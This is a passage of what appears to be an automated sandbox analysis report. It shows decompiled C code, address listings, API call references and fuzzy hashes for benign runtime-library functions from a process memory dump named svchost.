																		if(_t246 != 0) {
																			goto L56;
																		} else {
																			__eflags = _t191;
																			if(_t191 != 0) {
																				L62:
																				 *0xbf60c0 = E00BD0B10(_t246, 1, 4);
																				E00BD09EB(_t221);
																				_t323 = _t323 + 0xc;
																				goto L63;
																			} else {
																				 *0xbf60bc = E00BD0B10(_t246, 1, 4);
																				E00BD09EB(_t221);
																				_t323 = _t323 + 0xc;
																				__eflags =  *0xbf60bc - _t221; // 0xe016f8
																				if(__eflags == 0) {
																					goto L55;
																				} else {
																					_t303 =  *0xbf60c0; // 0xe19000
																					__eflags = _t303;
																					if(_t303 != 0) {
																						goto L64;
																					} else {
																						goto L62;
																					}
																				}
																			}
																		}
																	} else {
																		__eflags = _t191;
																		if(_t191 == 0) {
																			goto L58;
																		} else {
																			_t196 = L00BCFF04(_t221);
																			__eflags = _t196;
																			if(_t196 != 0) {
																				L63:
																				_t303 =  *0xbf60c0; // 0xe19000
																				__eflags = _t303;
																				if(_t303 == 0) {
																					L55:
																					_t221 = _t220 | 0xffffffff;
																					__eflags = _t221;
																					L56:
																					E00BD09EB(_t289);
																					_t136 = _t221;
																					goto L57;
																				} else {
																					goto L64;
																				}
																			} else {
																				goto L54;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t197 = E00BCC9CE();
														 *_t197 = 0x16;
														_t136 = _t197 | 0xffffffff;
														L57:
														return _t136;
													}
												} else {
													_t280 = _v16 + 1 + _t301 - _a4;
													asm("sbb eax, eax");
													 *(_t280 - 1) = _t218;
													_t204 = SetEnvironmentVariableA(_t301,  !( ~(_v5 & 0x000000ff)) & _t280);
													__eflags = _t204;
													if(_t204 == 0) {
														_t205 = E00BCC9CE();
														_t218 = _t218 | 0xffffffff;
														__eflags = _t218;
														 *_t205 = 0x2a;
													}
													goto L42;
												}
											}
										}
									}
								}
							} else {
								__eflags = _a8;
								if(_a8 == 0) {
									L14:
									__eflags = _t120;
									if(_t120 == 0) {
										 *0xbf60bc = E00BD0B10(_t231, 1, 4);
										E00BD09EB(_t218);
										_t299 =  *0xbf60bc; // 0xe016f8
										_t321 = _t321 + 0xc;
										__eflags = _t299;
										if(_t299 == 0) {
											goto L11;
										} else {
											__eflags =  *0xbf60c0 - _t218; // 0xe19000
											if(__eflags != 0) {
												goto L20;
											} else {
												 *0xbf60c0 = E00BD0B10(_t231, 1, 4);
												E00BD09EB(_t218);
												_t321 = _t321 + 0xc;
												__eflags =  *0xbf60c0 - _t218; // 0xe19000
												if(__eflags == 0) {
													goto L11;
												} else {
													goto L19;
												}
											}
										}
									} else {
										_t218 = 0;
										goto L12;
									}
								} else {
									__eflags =  *0xbf60c0 - _t218; // 0xe19000
									if(__eflags == 0) {
										goto L14;
									} else {
										_t214 = L00BCFEFF(0, _t283);
										__eflags = _t214;
										if(_t214 != 0) {
											L19:
											_t299 =  *0xbf60bc; // 0xe016f8
											L20:
											__eflags = _t299;
											if(_t299 == 0) {
												L11:
												_t218 = _t217 | 0xffffffff;
												__eflags = _t218;
												L12:
												E00BD09EB(_t287);
												_t119 = _t218;
												goto L13;
											} else {
												goto L21;
											}
										} else {
											goto L10;
										}
									}
								}
							}
						}
					}
				} else {
					_t215 = E00BCC9CE();
					 *_t215 = 0x16;
					_t119 = _t215 | 0xffffffff;
					L13:
					return _t119;
				}
				L130:
			}









































































































                            0x00bd61f0
                            0x00bd61f9
                            0x00bd61fe
                            0x00bd6215
                            0x00bd6217
                            0x00bd621c
                            0x00bd6220
                            0x00bd6221
                            0x00bd6223
                            0x00bd6273
                            0x00bd6278
                            0x00000000
                            0x00bd6225
                            0x00bd6225
                            0x00bd6227
                            0x00000000
                            0x00bd6229
                            0x00bd6229
                            0x00bd622d
                            0x00bd6233
                            0x00bd6236
                            0x00bd6239
                            0x00bd623f
                            0x00bd6242
                            0x00bd6247
                            0x00bd6249
                            0x00bd624c
                            0x00bd624d
                            0x00bd624d
                            0x00bd6253
                            0x00bd6255
                            0x00bd6257
                            0x00bd62eb
                            0x00bd62ee
                            0x00bd62f0
                            0x00bd62f2
                            0x00bd62f3
                            0x00bd62f4
                            0x00bd62f9
                            0x00bd62fe
                            0x00bd6300
                            0x00bd634a
                            0x00bd634a
                            0x00bd634d
                            0x00000000
                            0x00bd6353
                            0x00bd6353
                            0x00bd6355
                            0x00bd6358
                            0x00bd6358
                            0x00bd635b
                            0x00bd635d
                            0x00000000
                            0x00bd6363
                            0x00bd6363
                            0x00bd6369
                            0x00000000
                            0x00bd636f
                            0x00bd636f
                            0x00bd6371
                            0x00bd6379
                            0x00bd637b
                            0x00bd6380
                            0x00bd6383
                            0x00bd6385
                            0x00000000
                            0x00bd638b
                            0x00bd638b
                            0x00bd638e
                            0x00bd6390
                            0x00bd6393
                            0x00bd6396
                            0x00000000
                            0x00bd6396
                            0x00bd6385
                            0x00bd6369
                            0x00bd635d
                            0x00bd6302
                            0x00bd6302
                            0x00bd6304
                            0x00000000
                            0x00bd6306
                            0x00bd6309
                            0x00bd630f
                            0x00bd6312
                            0x00bd6315
                            0x00bd6329
                            0x00bd6329
                            0x00bd632c
                            0x00000000
                            0x00000000
                            0x00bd6325
                            0x00bd6328
                            0x00bd6328
                            0x00bd6328
                            0x00bd632e
                            0x00bd6330
                            0x00bd6338
                            0x00bd633a
                            0x00bd633f
                            0x00bd6342
                            0x00bd6344
                            0x00bd6346
                            0x00bd639a
                            0x00bd639a
                            0x00bd639a
                            0x00bd6317
                            0x00bd6317
                            0x00bd631a
                            0x00bd631c
                            0x00bd631c
                            0x00bd63a0
                            0x00bd63a3
                            0x00000000
                            0x00bd63a9
                            0x00bd63a9
                            0x00bd63ab
                            0x00bd63ae
                            0x00bd63ae
                            0x00bd63b0
                            0x00bd63b1
                            0x00bd63b1
                            0x00bd63bd
                            0x00bd63c5
                            0x00bd63c8
                            0x00bd63c9
                            0x00bd63cb
                            0x00bd6414
                            0x00bd6415
                            0x00000000
                            0x00bd63cd
                            0x00bd63d4
                            0x00bd63d9
                            0x00bd63dc
                            0x00bd63de
                            0x00bd6420
                            0x00bd6421
                            0x00bd6422
                            0x00bd6423
                            0x00bd6424
                            0x00bd6425
                            0x00bd642a
                            0x00bd642e
                            0x00bd6430
                            0x00bd6433
                            0x00bd6434
                            0x00bd6437
                            0x00bd6439
                            0x00bd644b
                            0x00bd644c
                            0x00bd644d
                            0x00bd6450
                            0x00bd6452
                            0x00bd6457
                            0x00bd645b
                            0x00bd645c
                            0x00bd645e
                            0x00bd64af
                            0x00bd64b4
                            0x00000000
                            0x00bd6460
                            0x00bd6460
                            0x00bd6462
                            0x00000000
                            0x00bd6464
                            0x00bd6464
                            0x00bd646a
                            0x00bd646c
                            0x00bd6470
                            0x00bd6473
                            0x00bd6476
                            0x00bd647c
                            0x00bd647e
                            0x00bd647f
                            0x00bd6485
                            0x00bd6488
                            0x00bd648a
                            0x00bd648a
                            0x00bd6490
                            0x00bd6492
                            0x00bd651f
                            0x00bd652a
                            0x00bd652d
                            0x00bd6532
                            0x00bd6537
                            0x00bd6539
                            0x00bd6583
                            0x00bd6583
                            0x00bd6586
                            0x00000000
                            0x00bd658c
                            0x00bd658c
                            0x00bd658e
                            0x00bd6591
                            0x00bd6591
                            0x00bd6594
                            0x00bd6596
                            0x00000000
                            0x00bd659c
                            0x00bd659c
                            0x00bd65a2
                            0x00000000
                            0x00bd65a8
                            0x00bd65a8
                            0x00bd65aa
                            0x00bd65b2
                            0x00bd65b4
                            0x00bd65b9
                            0x00bd65bc
                            0x00bd65be
                            0x00000000
                            0x00bd65c4
                            0x00bd65c4
                            0x00bd65c7
                            0x00bd65c9
                            0x00bd65cc
                            0x00bd65cf
                            0x00000000
                            0x00bd65cf
                            0x00bd65be
                            0x00bd65a2
                            0x00bd6596
                            0x00bd653b
                            0x00bd653b
                            0x00bd653d
                            0x00000000
                            0x00bd653f
                            0x00bd6542
                            0x00bd6548
                            0x00bd654b
                            0x00bd654e
                            0x00bd6562
                            0x00bd6562
                            0x00bd6565
                            0x00000000
                            0x00000000
                            0x00bd655e
                            0x00bd6561
                            0x00bd6561
                            0x00bd6561
                            0x00bd6567
                            0x00bd6569
                            0x00bd6571
                            0x00bd6573
                            0x00bd6578
                            0x00bd657b
                            0x00bd657d
                            0x00bd657f
                            0x00bd65d3
                            0x00bd65d3
                            0x00bd65d3
                            0x00bd6550
                            0x00bd6550
                            0x00bd6553
                            0x00bd6555
                            0x00bd6555
                            0x00bd65d9
                            0x00bd65dc
                            0x00000000
                            0x00bd65e2
                            0x00bd65e2
                            0x00bd65e4
                            0x00bd65e4
                            0x00bd65e7
                            0x00bd65e7
                            0x00bd65ea
                            0x00bd65ed
                            0x00bd65ed
                            0x00bd65f8
                            0x00bd65fc
                            0x00bd6604
                            0x00bd6607
                            0x00bd6608
                            0x00bd660a
                            0x00bd6651
                            0x00bd6652
                            0x00000000
                            0x00bd660c
                            0x00bd6614
                            0x00bd6619
                            0x00bd661c
                            0x00bd661e
                            0x00bd665d
                            0x00bd665e
                            0x00bd665f
                            0x00bd6660
                            0x00bd6661
                            0x00bd6662
                            0x00bd6667
                            0x00bd666a
                            0x00bd666b
                            0x00bd666e
                            0x00bd666f
                            0x00bd6672
                            0x00bd6674
                            0x00bd667d
                            0x00bd667f
                            0x00bd6681
                            0x00bd6683
                            0x00bd6685
                            0x00bd6685
                            0x00bd6688
                            0x00bd6689
                            0x00bd6689
                            0x00bd6685
                            0x00bd668f
                            0x00bd669a
                            0x00bd669d
                            0x00bd669e
                            0x00bd66a0
                            0x00bd6707
                            0x00bd6707
                            0x00000000
                            0x00bd66a2
                            0x00bd66a2
                            0x00bd66a5
                            0x00bd66f7
                            0x00bd66f9
                            0x00bd66ff
                            0x00000000
                            0x00bd66a7
                            0x00bd66a7
                            0x00bd66aa
                            0x00bd66aa
                            0x00bd66ac
                            0x00bd66ac
                            0x00bd66ae
                            0x00bd66ae
                            0x00bd66b1
                            0x00bd66b1
                            0x00bd66b3
                            0x00bd66b4
                            0x00bd66b4
                            0x00bd66b8
                            0x00bd66bc
                            0x00bd66c0
                            0x00bd66ca
                            0x00bd66cd
                            0x00bd66d2
                            0x00bd66d5
                            0x00bd66d9
                            0x00000000
                            0x00bd66db
                            0x00bd66e3
                            0x00bd66e8
                            0x00bd66eb
                            0x00bd66ed
                            0x00bd670c
                            0x00bd670e
                            0x00bd670f
                            0x00bd6710
                            0x00bd6711
                            0x00bd6712
                            0x00bd6713
                            0x00bd6718
                            0x00bd671b
                            0x00bd671c
                            0x00bd671e
                            0x00bd671f
                            0x00bd6720
                            0x00bd6721
                            0x00bd6724
                            0x00bd6726
                            0x00bd672f
                            0x00bd6730
                            0x00bd6732
                            0x00bd6734
                            0x00bd6736
                            0x00bd6739
                            0x00bd673a
                            0x00bd673c
                            0x00bd673e
                            0x00bd673e
                            0x00bd6741
                            0x00bd6742
                            0x00bd6742
                            0x00bd673e
                            0x00bd6746
                            0x00bd6751
                            0x00bd6755
                            0x00bd6757
                            0x00bd67c5
                            0x00bd67c5
                            0x00000000
                            0x00bd6759
                            0x00bd6759
                            0x00bd675b
                            0x00bd67b5
                            0x00bd67b6
                            0x00bd67bc
                            0x00000000
                            0x00bd675d
                            0x00bd675f
                            0x00bd675f
                            0x00bd6761
                            0x00bd6761
                            0x00bd6763
                            0x00bd6763
                            0x00bd6766
                            0x00bd6766
                            0x00bd6769
                            0x00bd676c
                            0x00bd676c
                            0x00bd6778
                            0x00bd677c
                            0x00bd6784
                            0x00bd678a
                            0x00bd678f
                            0x00bd6792
                            0x00bd6796
                            0x00000000
                            0x00bd6798
                            0x00bd67a0
                            0x00bd67a5
                            0x00bd67a8
                            0x00bd67aa
                            0x00bd67ca
                            0x00bd67cc
                            0x00bd67cd
                            0x00bd67ce
                            0x00bd67cf
                            0x00bd67d0
                            0x00bd67d1
                            0x00bd67d6
                            0x00bd67d9
                            0x00bd67dc
                            0x00bd67dd
                            0x00bd67de
                            0x00bd67df
                            0x00bd67e5
                            0x00bd67e7
                            0x00bd67ea
                            0x00bd6816
                            0x00bd6816
                            0x00bd6816
                            0x00bd681b
                            0x00bd67ec
                            0x00bd67ec
                            0x00bd67ef
                            0x00bd67f5
                            0x00bd67fa
                            0x00bd67fd
                            0x00bd67ff
                            0x00000000
                            0x00bd6801
                            0x00bd6803
                            0x00bd6806
                            0x00bd6808
                            0x00bd6824
                            0x00bd6826
                            0x00bd680a
                            0x00bd680a
                            0x00bd680c
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bd680c
                            0x00bd6808
                            0x00000000
                            0x00bd680e
                            0x00bd680e
                            0x00bd6811
                            0x00bd6811
                            0x00000000
                            0x00bd67ef
                            0x00bd681d
                            0x00bd6823
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bd67aa
                            0x00000000
                            0x00bd67ac
                            0x00bd67ac
                            0x00bd67af
                            0x00bd67af
                            0x00bd67b3
                            0x00bd67b3
                            0x00000000
                            0x00bd67b3
                            0x00bd675b
                            0x00bd6728
                            0x00bd6728
                            0x00bd67c0
                            0x00bd67c4
                            0x00bd67c4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bd66ed
                            0x00000000
                            0x00bd66ef
                            0x00bd66ef
                            0x00bd66f2
                            0x00bd66f2
                            0x00000000
                            0x00bd66f6
                            0x00bd66a5
                            0x00bd6676
                            0x00bd6676
                            0x00bd6702
                            0x00bd6706
                            0x00bd6706
                            0x00bd6620
                            0x00bd6624
                            0x00bd6627
                            0x00bd6631
                            0x00bd6639
                            0x00bd663f
                            0x00bd6641
                            0x00bd6643
                            0x00bd6648
                            0x00bd6648
                            0x00bd664b
                            0x00bd664b
                            0x00000000
                            0x00bd6641
                            0x00bd661e
                            0x00bd660a
                            0x00bd65dc
                            0x00bd653d
                            0x00bd6498
                            0x00bd6498
                            0x00bd649d
                            0x00bd64a0
                            0x00bd64cd
                            0x00bd64cd
                            0x00bd64cf
                            0x00000000
                            0x00bd64d1
                            0x00bd64d1
                            0x00bd64d3
                            0x00bd64fe
                            0x00bd6508
                            0x00bd650d
                            0x00bd6512
                            0x00000000
                            0x00bd64d5
                            0x00bd64df
                            0x00bd64e4
                            0x00bd64e9
                            0x00bd64ec
                            0x00bd64f2
                            0x00000000
                            0x00bd64f4
                            0x00bd64f4
                            0x00bd64fa
                            0x00bd64fc
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bd64fc
                            0x00bd64f2
                            0x00bd64d3
                            0x00bd64a2
                            0x00bd64a2
                            0x00bd64a4
                            0x00000000
                            0x00bd64a6
                            0x00bd64a6
                            0x00bd64ab
                            0x00bd64ad
                            0x00bd6515
                            0x00bd6515
                            0x00bd651b
                            0x00bd651d
                            0x00bd64ba
                            0x00bd64ba
                            0x00bd64ba
                            0x00bd64bd
                            0x00bd64be
                            0x00bd64c5
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bd64ad
                            0x00bd64a4
                            0x00bd64a0
                            0x00bd6492
                            0x00bd6462
                            0x00bd643b
                            0x00bd643b
                            0x00bd6440
                            0x00bd6446
                            0x00bd64c8
                            0x00bd64cc
                            0x00bd64cc
                            0x00bd63e0
                            0x00bd63e9
                            0x00bd63f1
                            0x00bd63f5
                            0x00bd63fc
                            0x00bd6402
                            0x00bd6404
                            0x00bd6406
                            0x00bd640b
                            0x00bd640b
                            0x00bd640e
                            0x00bd640e
                            0x00000000
                            0x00bd6404
                            0x00bd63de
                            0x00bd63cb
                            0x00bd63a3
                            0x00bd6304
                            0x00bd625d
                            0x00bd625d
                            0x00bd6260
                            0x00bd6291
                            0x00bd6291
                            0x00bd6293
                            0x00bd62a3
                            0x00bd62a8
                            0x00bd62ad
                            0x00bd62b3
                            0x00bd62b6
                            0x00bd62b8
                            0x00000000
                            0x00bd62ba
                            0x00bd62ba
                            0x00bd62c0
                            0x00000000
                            0x00bd62c2
                            0x00bd62cc
                            0x00bd62d1
                            0x00bd62d6
                            0x00bd62d9
                            0x00bd62df
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bd62df
                            0x00bd62c0
                            0x00bd6295
                            0x00bd6295
                            0x00000000
                            0x00bd6295
                            0x00bd6262
                            0x00bd6262
                            0x00bd6268
                            0x00000000
                            0x00bd626a
                            0x00bd626a
                            0x00bd626f
                            0x00bd6271
                            0x00bd62e1
                            0x00bd62e1
                            0x00bd62e7
                            0x00bd62e7
                            0x00bd62e9
                            0x00bd627e
                            0x00bd627e
                            0x00bd627e
                            0x00bd6281
                            0x00bd6282
                            0x00bd6289
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bd6271
                            0x00bd6268
                            0x00bd6260
                            0x00bd6257
                            0x00bd6227
                            0x00bd6200
                            0x00bd6200
                            0x00bd6205
                            0x00bd620b
                            0x00bd628c
                            0x00bd6290
                            0x00bd6290
                            0x00000000

                            APIs
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: _free$EnvironmentVariable$___from_strstr_to_strchr_wcschr
                            • String ID:
                            • API String ID: 2719235668-0
                            • Opcode ID: 684d4712a0003c4634d648fd8c286fd9be34c1f67651816c03398425eac9243e
                            • Instruction ID: 2903112c3061f06805aaae68fc4ca95fd02b341958f3b99abc98ec98a349ace8
                            • Opcode Fuzzy Hash: 684d4712a0003c4634d648fd8c286fd9be34c1f67651816c03398425eac9243e
                            • Instruction Fuzzy Hash: 7BD1E371900204ABDB25AF789892B6EFBE4EF11324F1441EFE94597382FB369D01CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BC4740, Relevance: 24.6, APIs: 5, Strings: 9, Instructions: 99libraryloaderCOMMON
                            Download Yara Rule
                            C-Code - Quality: 22%
                            			E00BC4740(void* __edx, char* _a4) {
				short* _v24;
				intOrPtr _v28;
				char _v32;
				int _t18;
				short* _t23;
				void* _t24;
				void* _t25;
				char* _t26;
				struct HINSTANCE__* _t27;
				int _t28;
				intOrPtr* _t30;
				intOrPtr* _t32;

				_t25 = __edx;
				_t33 =  &_v32;
				_t26 = _a4;
				_t28 = MultiByteToWideChar(0xfde9, 0, _t26, 0xffffffff, 0, 0);
				_t36 = _t28;
				if(_t28 != 0) {
					_t2 = _t28 + 1; // 0x1
					_push(2);
					_t23 = E00BC97F8(_t24);
					_t33 =  &_v32 + 8;
					__eflags = _t23;
					if(__eflags != 0) {
						__eflags = MultiByteToWideChar(0xfde9, 0, _t26, 0xffffffff, _t23, _t28);
						if(__eflags == 0) {
							_push("Failed to decode wchar_t from UTF-8\n");
							goto L6;
						}
					} else {
						_push("Out of memory.");
						_push("win32_utils_from_utf8");
						goto L7;
					}
				} else {
					_push("Failed to get wchar_t buffer size.\n");
					L6:
					_push("MultiByteToWideChar");
					L7:
					E00BC1860(_t25, _t36);
					_t33 = _t33 + 8;
					_t23 = 0;
				}
				_t27 = LoadLibraryA("kernel32");
				_t32 = GetProcAddress(_t27, "CreateActCtxW");
				_t30 = GetProcAddress(_t27, "ActivateActCtx");
				if(_t32 == 0 || _t30 == 0) {
					L14:
					__eflags = 0;
					return 0;
				} else {
					asm("xorps xmm0, xmm0");
					asm("movups [esp+0x10], xmm0");
					asm("movups [esp+0x24], xmm0");
					_v32 = 0x20;
					_v24 = _t23;
					_v28 = 0x10;
					 *0xbec000 =  *_t32( &_v32);
					L00BC9803(_t23);
					_t18 =  *0xbec000; // 0xffffffff
					if(_t18 == 0xffffffff) {
						L13:
						_push(0);
						 *0xbec000 = 0xffffffff;
						E00BC4860(_t25);
						goto L14;
					} else {
						_push(0xbf4a50);
						_push(_t18);
						if( *_t30() == 0) {
							goto L13;
						} else {
							return 1;
						}
					}
				}
			}















                            0x00bc4740
                            0x00bc4740
                            0x00bc474d
                            0x00bc4761
                            0x00bc4763
                            0x00bc4765
                            0x00bc476e
                            0x00bc4771
                            0x00bc4779
                            0x00bc477b
                            0x00bc477e
                            0x00bc4780
                            0x00bc479c
                            0x00bc479e
                            0x00bc47a0
                            0x00000000
                            0x00bc47a0
                            0x00bc4782
                            0x00bc4782
                            0x00bc4787
                            0x00000000
                            0x00bc4787
                            0x00bc4767
                            0x00bc4767
                            0x00bc47a5
                            0x00bc47a5
                            0x00bc47aa
                            0x00bc47aa
                            0x00bc47af
                            0x00bc47b2
                            0x00bc47b2
                            0x00bc47c5
                            0x00bc47d5
                            0x00bc47d9
                            0x00bc47dd
                            0x00bc4853
                            0x00bc4853
                            0x00bc4859
                            0x00bc47e3
                            0x00bc47e3
                            0x00bc47ea
                            0x00bc47f0
                            0x00bc47f5
                            0x00bc47fd
                            0x00bc4801
                            0x00bc480c
                            0x00bc4811
                            0x00bc4816
                            0x00bc4821
                            0x00bc483c
                            0x00bc483c
                            0x00bc483e
                            0x00bc4848
                            0x00000000
                            0x00bc4823
                            0x00bc4823
                            0x00bc4828
                            0x00bc482d
                            0x00000000
                            0x00bc4832
                            0x00bc483b
                            0x00bc483b
                            0x00bc482d
                            0x00bc4821

                            APIs
                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00BC475F
                            • LoadLibraryA.KERNEL32(kernel32,?,?,?,?,?,?,?,?,00BC21A8,?,?,?,?,00BC2639,00000000), ref: 00BC47B9
                            • GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 00BC47CD
                            • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 00BC47D7
                              • Part of subcall function 00BC4860: GetLastError.KERNEL32(00BC18B9,00000000,?,?,?,00000400,?,00000000,?), ref: 00BC4883
                              • Part of subcall function 00BC4860: FormatMessageW.KERNEL32(00001000,00000000,?,00000400,00000000,00001000,00000000,00BC18B9,00000000,?,?,?,00000400,?,00000000,?), ref: 00BC48A2
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: AddressProc$ByteCharErrorFormatLastLibraryLoadMessageMultiWide
                            • String ID: $ActivateActCtx$CreateActCtxW$Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$kernel32$win32_utils_from_utf8
                            • API String ID: 476984482-989751517
                            • Opcode ID: 2f4b081eb6467e976dee90f958c2472009677db9a21a02f9e851676beee59252
                            • Instruction ID: f7f50e617d7f24e839794dcf04d4e5d0751c063fddcbe0b0f513258cc9213e70
                            • Opcode Fuzzy Hash: 2f4b081eb6467e976dee90f958c2472009677db9a21a02f9e851676beee59252
                            • Instruction Fuzzy Hash: 2421C131A4434967E3206BAA5C92F5776C8DF41B34F1006BEF920A71D1EBF0DE4542A2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BD81FB, Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00BD81FB(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0xbec838) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E00BD09EB(_t46);
							E00BD7D80( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E00BD09EB(_t47);
							E00BD7E7E( *((intOrPtr*)(_t74 + 0x88)));
						}
						E00BD09EB( *((intOrPtr*)(_t74 + 0x7c)));
						E00BD09EB( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E00BD09EB( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E00BD09EB( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E00BD09EB( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E00BD09EB( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E00BD836E( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0xbec300) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E00BD09EB(_t31);
							E00BD09EB( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E00BD09EB(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E00BD09EB(_t74);
			}















                            0x00bd8203
                            0x00bd8207
                            0x00bd820f
                            0x00bd8218
                            0x00bd821d
                            0x00bd8224
                            0x00bd822c
                            0x00bd8234
                            0x00bd823f
                            0x00bd8245
                            0x00bd8246
                            0x00bd824e
                            0x00bd8256
                            0x00bd8261
                            0x00bd8267
                            0x00bd826b
                            0x00bd8276
                            0x00bd827c
                            0x00bd821d
                            0x00bd827d
                            0x00bd8285
                            0x00bd8298
                            0x00bd82ab
                            0x00bd82b9
                            0x00bd82c4
                            0x00bd82c9
                            0x00bd82d2
                            0x00bd82da
                            0x00bd82db
                            0x00bd82e1
                            0x00bd82e4
                            0x00bd82e7
                            0x00bd82ee
                            0x00bd82f0
                            0x00bd82f4
                            0x00bd82fc
                            0x00bd8303
                            0x00bd8309
                            0x00bd830a
                            0x00bd830a
                            0x00bd8311
                            0x00bd8313
                            0x00bd8318
                            0x00bd8320
                            0x00bd8325
                            0x00bd8326
                            0x00bd8326
                            0x00bd8329
                            0x00bd832c
                            0x00bd832f
                            0x00bd8332
                            0x00bd8332
                            0x00bd8344

                            APIs
                            • ___free_lconv_mon.LIBCMT ref: 00BD823F
                              • Part of subcall function 00BD7D80: _free.LIBCMT ref: 00BD7D9D
                              • Part of subcall function 00BD7D80: _free.LIBCMT ref: 00BD7DAF
                              • Part of subcall function 00BD7D80: _free.LIBCMT ref: 00BD7DC1
                              • Part of subcall function 00BD7D80: _free.LIBCMT ref: 00BD7DD3
                              • Part of subcall function 00BD7D80: _free.LIBCMT ref: 00BD7DE5
                              • Part of subcall function 00BD7D80: _free.LIBCMT ref: 00BD7DF7
                              • Part of subcall function 00BD7D80: _free.LIBCMT ref: 00BD7E09
                              • Part of subcall function 00BD7D80: _free.LIBCMT ref: 00BD7E1B
                              • Part of subcall function 00BD7D80: _free.LIBCMT ref: 00BD7E2D
                              • Part of subcall function 00BD7D80: _free.LIBCMT ref: 00BD7E3F
                              • Part of subcall function 00BD7D80: _free.LIBCMT ref: 00BD7E51
                              • Part of subcall function 00BD7D80: _free.LIBCMT ref: 00BD7E63
                              • Part of subcall function 00BD7D80: _free.LIBCMT ref: 00BD7E75
                            • _free.LIBCMT ref: 00BD8234
                              • Part of subcall function 00BD09EB: RtlFreeHeap.NTDLL(00000000,00000000,?,00BD7F15,?,00000000,?,00000000,?,00BD7F3C,?,00000007,?,?,00BD8393,?), ref: 00BD0A01
                              • Part of subcall function 00BD09EB: GetLastError.KERNEL32(?,?,00BD7F15,?,00000000,?,00000000,?,00BD7F3C,?,00000007,?,?,00BD8393,?,?), ref: 00BD0A13
                            • _free.LIBCMT ref: 00BD8256
                            • _free.LIBCMT ref: 00BD826B
                            • _free.LIBCMT ref: 00BD8276
                            • _free.LIBCMT ref: 00BD8298
                            • _free.LIBCMT ref: 00BD82AB
                            • _free.LIBCMT ref: 00BD82B9
                            • _free.LIBCMT ref: 00BD82C4
                            • _free.LIBCMT ref: 00BD82FC
                            • _free.LIBCMT ref: 00BD8303
                            • _free.LIBCMT ref: 00BD8320
                            • _free.LIBCMT ref: 00BD8338
                            Memory Dump Source
